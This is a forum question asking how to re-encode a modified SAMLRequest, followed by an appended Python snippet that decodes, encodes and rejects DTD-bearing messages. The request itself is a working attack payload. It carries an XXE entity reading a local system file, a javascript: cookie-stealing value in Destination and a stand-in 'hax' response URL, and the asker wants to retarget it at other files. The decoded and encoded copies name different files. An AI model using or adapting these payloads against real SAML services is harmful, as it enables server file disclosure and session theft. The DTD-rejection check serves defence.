How do I get the following SAMLRequest encoded correctly?



I'm just about to throw the laptop out of the nearest window. I'm doing a SAMLRequest; the encoded format below works without any issues. However, I want to make some changes, then encode and send. Here's the original encoded request that I'm trying to alter:



SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI%2FPjwhRE9DVFlQRSBkb2MgWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdID4KPHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiB4bWxuczpzYW1sPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0iZGZmNTc4YzMwNDlmNWJhMTAyMjNkZjgyMDEyM2ZjY2NiYzEzNGU3NTIwIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNC0wNS0wOFQxMTo1ODozM1oiIERlc3RpbmF0aW9uPSJqYXZhc2NyaXB0OnByb21wdChkb2N1bWVudC5kb21haW4sZG9jdW1lbnQuY29va2llKSI%2BIDxzYW1sOklzc3Vlcj4meHhlOzwvc2FtbDpJc3N1ZXI%2BIDxzYW1scDpFeHRlbnNpb25zPiA8VUk%2BPFVSTD4meHhlOzwvVVJMPjwvVUk%2BIDwvc2FtbHA6RXh0ZW5zaW9ucz4gPGRzOlNpZ25hdHVyZSB4bWxuczpkcz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnIyI%2BIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BIDxkczpTaWduYXR1cmVNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjcnNhLXNoYTEiLz4gPGRzOlJlZmVyZW5jZSBVUkk9IiNkZmY1NzhjMzA0OWY1YmExMDIyM2RmODIwMTIzZmNjY2JjMTM0ZTc1MjAiPjxkczpUcmFuc2Zvcm1zPjxkczpUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjZW52ZWxvcGVkLXNpZ25hdHVyZSIvPjxkczpUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzEwL3htbC1leGMtYzE0biMiLz48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPjVCV2l5WDl6dkFDR1I1eStOQjJ3eHVYSnRKRT08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BUzRMaENVT0IweWxUNGNqWFVWQWJudnJCakJCenliYXh2V0hUR3c5Sm5Sc3lVQjFNZXRSSytWSHZWL00zUTROWDBER1VORlhsQ1pSM3NNMm1zUU9BaGJqWnhrS1FDTlVCaWc1Ni8wM3Bnc1hscFdKRmhuQkw4bTBzUlJaQmR1ZjRRZEhuL2h4eHl2QUt6YWRQUTVubUlQbUNQcE8xQ1FzUlVUTXJ0LzEzVklFPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BIDwvZHM6U2lnbmF0dXJlPjwvc2FtbHA6QXV0aG5SZXF1ZXN0Pg%3D%3D&response_url=http%3A%2F%2Fhax&RelayState=aHR0cHM6Ly9uczM2NTMyOS5vdmgubmV0Ojg0NDMv&RefererScheme=https&Referer
Host=https%3A%2F%2FX.com%3A8443&RefererPort=8443


Here's what I've got so far after nearly 2 days of trying to figure out how to decode the original (I did it by simply URL-decoding, then base64-decoding):



SAMLRequest=<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/app.conf"> ] >
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="dff578c3049f5ba10223df820123fcccbc134e7520" Version="2.0" IssueInstant="2014-05-08T11:58:33Z" Destination="javascript:prompt(document.domain,document.cookie)"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> <ds:Reference URI="#dff578c3049f5ba10223df820123fcccbc134e7520"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>&response_url=http://hax&RelayState=https://ns365329.ovh.net:8443/&RefererScheme=https&RefererHost=https://X.com:8443&RefererPort=8443


The problem is that when I re-encode after making my changes (reading a different file), it's nowhere near the original encoded one. I tried URL encoding then base64 decode, to no avail.


Appreciate any input, really!
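
The decoding order described in the post (percent-decode, then base64-decode) and its exact inverse, written from the receiving endpoint's side as an added example that is not part of the original post. It also shows the check a service provider or identity provider should apply to the decoded XML: refuse any message that carries a DOCTYPE. It assumes a plain base64 parameter with no DEFLATE step, as in the value above; the function names and both sample messages are constructed for illustration.

```python
import base64
from urllib.parse import quote, unquote
from xml.parsers import expat


class DtdForbidden(ValueError):
    """Raised when a decoded SAML message carries a DOCTYPE declaration."""


def decode_saml_param(value: str) -> bytes:
    """Percent-decode first, then base64-decode (order used in the post)."""
    return base64.b64decode(unquote(value), validate=True)


def encode_saml_param(xml: bytes) -> str:
    """Exact inverse: base64-encode first, then percent-encode +, / and =."""
    return quote(base64.b64encode(xml).decode("ascii"), safe="")


def reject_dtd(xml: bytes) -> None:
    """Parse with expat and refuse any document that declares a DTD."""
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdForbidden(f"DOCTYPE {name!r} not allowed in SAML messages")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml, True)


def inspect(value: str) -> str:
    """Return 'accepted' or 'rejected' for a raw SAMLRequest parameter."""
    try:
        reject_dtd(decode_saml_param(value))
    except DtdForbidden:
        return "rejected"
    return "accepted"


# Constructed sample messages (not taken from the post).
CLEAN = (b'<samlp:AuthnRequest '
         b'xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
         b'ID="_a1" Version="2.0"/>')
WITH_DTD = b'<!DOCTYPE doc [ <!ENTITY e "x"> ]>' + CLEAN

if __name__ == "__main__":
    for label, msg in (("clean", CLEAN), ("with DTD", WITH_DTD)):
        print(label, "->", inspect(encode_saml_param(msg)))
```

Because percent-encoding is applied last, the characters `+`, `/` and `=` from the base64 alphabet appear as `%2B`, `%2F` and `%3D` in the parameter, which is the pattern visible in the original encoded value.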

